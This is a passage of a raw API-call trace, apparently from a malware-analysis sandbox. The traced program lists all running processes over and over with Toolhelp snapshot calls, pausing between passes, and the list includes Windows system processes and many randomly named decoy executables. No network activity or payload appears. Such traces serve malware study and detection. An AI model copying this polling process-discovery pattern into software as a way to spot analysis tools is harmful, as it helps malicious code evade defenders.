cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0151.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.791] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.865] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0151.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0151.875] CloseHandle (hObject=0xbc) returned 1 [0151.875] Sleep (dwMilliseconds=0x12c) [0152.265] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.272] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.273] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.274] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.276] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.393] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.400] 
